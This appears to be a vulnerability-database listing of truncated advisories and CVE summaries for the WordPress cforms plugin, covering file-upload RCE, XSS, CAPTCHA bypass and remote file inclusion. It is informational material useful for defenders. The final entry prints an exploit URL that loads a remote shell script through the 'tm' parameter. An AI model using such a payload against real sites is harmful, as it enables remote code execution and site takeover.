Wordpress Plugin Cforms 14.7 Remote Code Execution Vulnerability
Cforms version 14.7 suffers from a remote code execution vulnerability. Advisory: Remote Code Execution via Unauthorised File upload in Cforms 14.7 Author: Zakhar Fedotkin Affected Software: Wordpress Plugin Cforms II 14.x-14.7 Release: 12th Nov 2014 Vendor URL:...
Cforms & CformsII <= 14.7 - Remote Code Execution via Unauthorised File Upload
...
Cforms 14.7 Remote Code Execution
Advisory: Remote Code Execution via Unauthorised File upload in Cforms 14.7 Advisory ID: - Author: Zakhar Fedotkin Affected Software: Wordpress Plugin Cforms II 14.x-14.7 Release: 12th Nov 2014 Vendor URL: https://wordpress.org/plugins/cforms2/ Vendor Status: fixed CVE-ID: -...
Cforms < 13.2 - XSS
The cforms WordPress plugin was affected by an XSS security vulnerability...
Cforms < 10.2 - XSS
The cforms WordPress plugin was affected by an XSS security vulnerability...
Cforms < 10.5 - XSS
The cforms WordPress plugin was affected by an XSS security vulnerability...
cforms II vulnerable to cross-site scripting
Overview cforms II contains a cross-site scripting vulnerability. cforms II provided by delicious days is a plugin for WordPress. cforms II contains a cross-site scripting vulnerability. Kousuke Ebihara and Yuya Watanabe of Tejimaya.inc reported this vulnerability to IPA. JPCERT/CC coordinated wi...
JVN#35256978: cforms II vulnerable to cross-site scripting
cforms II provided by delicious days is a plugin for WordPress. cforms II contains a cross-site scripting vulnerability. Impact An arbitrary script may be executed on the user's web browser. Solution Update the Software Update to the latest version according to the information provided by the...
Cforms & CformsII <= 14.10.1 - CAPTCHA Bypass
The cformsII plugin (slug: cforms) and its fork (slug: cforms2) have a CAPTCHA Bypass vulnerability. The MD5 hash for matching the answer is sent with the forms and so it can be overwritten. This is fixed in the fork cforms2 with version 14.11 (see changelog for confirmation). The original delicious:da...
Preemptive Protection against WordPress cforms Plugin Cross-Site Scripting (XSS) Vulnerability
A cross-site scripting (XSS) vulnerability has been reported in the cforms plugin for WordPress. cforms is a highly customizable, flexible and powerful form builder plugin, covering a variety of use cases and features from attachments to multi-form management. A remote attacker may exploit this...
CVE-2010-3977
Multiple cross-site scripting (XSS) vulnerabilities in wp-content/plugins/cforms/lib_ajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the (1) rs and (2) rsargs parameters...
Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities in wp-content/plugins/cforms/lib_ajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the (1) rs and (2) rsargs parameters...
CVE-2010-3977
CVE-2010-3977 affects the WordPress plugin cforms (version 11.5) via the file wp-content/plugins/cforms/lib_ajax.php. The root cause is improper validation/sanitization of user-supplied input in the rs and rsargs[] parameters, enabling remote attackers to inject arbitrary HTML/JavaScript (XSS) int...
cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977
Dear List, I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability. Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ cforms WordPress Plugin Cross Site Scripting Vulnerability CVE-2010-3977...
Cforms <= 13.1 - 'lib_ajax.php' Cross-Site Scripting (XSS)
The cforms plugin has an XSS vulnerability in the file lib_ajax.php via the rs and rsargs parameters. It is fixed in version 13.2. The cforms2 fork was forked at 14.6, so it is not affected...
Remote file inclusion
PHP remote file inclusion vulnerability in cforms-css.php in Oliver Seidel cforms (contactforms), a Wordpress plugin, allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter. NOTE: CVE disputes this issue for 7.3, since there is no tm parameter, and the code exits with a...
CVE-2008-0560
CVE-2008-0560 affects the WordPress plugin cforms (Oliver Seidel cforms, also known as contactforms). The vulnerability is in cforms-css.php and allows remote attackers to execute arbitrary PHP code via a URL parameter tm, due to a PHP remote file inclusion. Several sources note that version 7.3 ...
PT-2008-2186 · Oliver Seidel · Cforms
Name of the Vulnerable Software and Affected Versions: cforms contactforms versions prior to 7.3 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter in the cforms-css.php file. This is a PHP remote file inclusion vulnerability in the Oliver...
WordPress Contact Form Plugin <= 7.3 - Remote File Inclusion
Because of this vulnerability in cforms-css.php, attackers can execute arbitrary PHP code via a URL in the "tm" parameter. Solution Update the plugin...
contactforms-rfi.txt
Discovery by: Sw33t h4cK3r ----------- Exploit : http://Example.com/contactforms/cforms-css.php?tm=http://site.com/shell.php...